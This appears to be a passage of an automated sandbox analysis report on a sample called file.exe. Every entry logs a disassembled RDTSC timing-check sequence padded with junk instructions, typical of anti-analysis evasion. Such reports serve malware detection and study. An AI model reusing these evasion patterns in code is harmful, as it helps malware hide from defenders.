                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C772 second address: F3C780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4178B56566h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3EFA6 second address: F3EFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F431CC second address: F431D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F42D3B second address: F42D4E instructions: 0x00000000 rdtsc 0x00000002 js 00007F417883CDCEh 0x00000008 jl 00007F417883CDC6h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46BC8 second address: F46BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4178B56566h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F4178B56566h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46E87 second address: F46E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F46E8F second address: F46E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DCFE second address: F4DD37 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F417883CDC8h 0x00000008 jmp 00007F417883CDD7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F417883CDCBh 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007F417883CDC6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DD37 second address: F4DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C532 second address: F4C53E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C53E second address: F4C544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CB27 second address: F4CB42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F417883CDD2h 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD520 second address: EFD52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4178B56566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD52B second address: EFD531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D9EF second address: F4D9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5107C second address: F51080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51080 second address: F5108C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F4178B56566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5108C second address: F510F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F417883CDC6h 0x0000000b jmp 00007F417883CDD7h 0x00000010 popad 0x00000011 push eax 0x00000012 jng 00007F417883CDC6h 0x00000018 jmp 00007F417883CDD9h 0x0000001d pop eax 0x0000001e pop edx 0x0000001f pop eax 0x00000020 jc 00007F417883CDF7h 0x00000026 push ebx 0x00000027 jmp 00007F417883CDD7h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51252 second address: F51277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4178B56579h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51277 second address: F51289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F417883CDC6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51289 second address: F5128D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F513CA second address: F513D4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F417883CDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F513D4 second address: F513E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F4178B56566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F516C5 second address: F516D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F516D1 second address: F516E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51822 second address: F5182E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F417883CDC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5182E second address: F51832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F582B1 second address: F582B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58F18 second address: F58F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61800 second address: F61806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61C39 second address: F61C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61C3F second address: F61C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61C43 second address: F61C52 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61C52 second address: F61C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61C58 second address: F61C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61DED second address: F61DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F417883CDC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61DF7 second address: F61E01 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F620AE second address: F620B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6220E second address: F62214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BC30 second address: F6BC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BC34 second address: F6BC49 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jo 00007F4178B56576h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BC49 second address: F6BC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F69F93 second address: F69F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BA86 second address: F6BA92 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F417883CDCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BA92 second address: F6BA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6BA9A second address: F6BAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70373 second address: F7039F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4178B5656Eh 0x00000015 jno 00007F4178B5656Eh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F741D3 second address: F741FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F417883CDD8h 0x00000009 ja 00007F417883CDC6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F741FC second address: F74217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74217 second address: F74226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F417883CDCBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74226 second address: F74236 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4178B56566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A28D second address: F7A293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A293 second address: F7A299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A299 second address: F7A2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F417883CDD7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7A2BB second address: F7A2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83A7F second address: F83A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83A85 second address: F83AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4178B56575h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88A2B second address: F88A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88BD6 second address: F88BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4178B56566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88BE2 second address: F88BEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88BEC second address: F88C07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4178B56566h 0x00000008 js 00007F4178B56566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jng 00007F4178B56578h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88C07 second address: F88C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F417883CDCCh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88C1B second address: F88C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88C21 second address: F88C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F417883CDC6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92289 second address: F9228D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA10A0 second address: FA10BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F417883CDD7h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA10BF second address: FA10CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA10CB second address: FA10CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA10CF second address: FA10F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jbe 00007F4178B56566h 0x00000012 jns 00007F4178B56566h 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA13E0 second address: FA13EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F417883CDC6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1543 second address: FA1547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA168F second address: FA1695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1695 second address: FA1699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1699 second address: FA16B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA17FA second address: FA17FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2300 second address: FA2316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA2316 second address: FA231C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5400 second address: FA5405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5405 second address: FA540F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4178B56566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5111 second address: FA511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA511E second address: FA5135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56573h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0F7E second address: FC0F82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0F82 second address: FC0F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4178B56570h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0F9A second address: FC0FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD28DE second address: FD28ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F4178B56566h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD28ED second address: FD28F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD28F1 second address: FD28F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD31B1 second address: FD31C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD31C6 second address: FD31CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3621 second address: FD3626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3626 second address: FD3639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F4178B56566h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3792 second address: FD379A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD379A second address: FD37B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4178B56574h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4FBC second address: FD4FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4FC0 second address: FD4FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4FC6 second address: FD4FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F417883CDCCh 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F417883CDC6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7B8C second address: FD7B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7C3D second address: FD7C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E3A second address: FD7E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B5656Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F4178B56568h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push dword ptr [ebp+122D244Ch] 0x0000002c mov dh, 30h 0x0000002e call 00007F4178B56569h 0x00000033 jmp 00007F4178B56578h 0x00000038 push eax 0x00000039 pushad 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7E98 second address: FD7EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 je 00007F417883CDC6h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7EAE second address: FD7ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4178B56577h 0x00000012 rdtsc
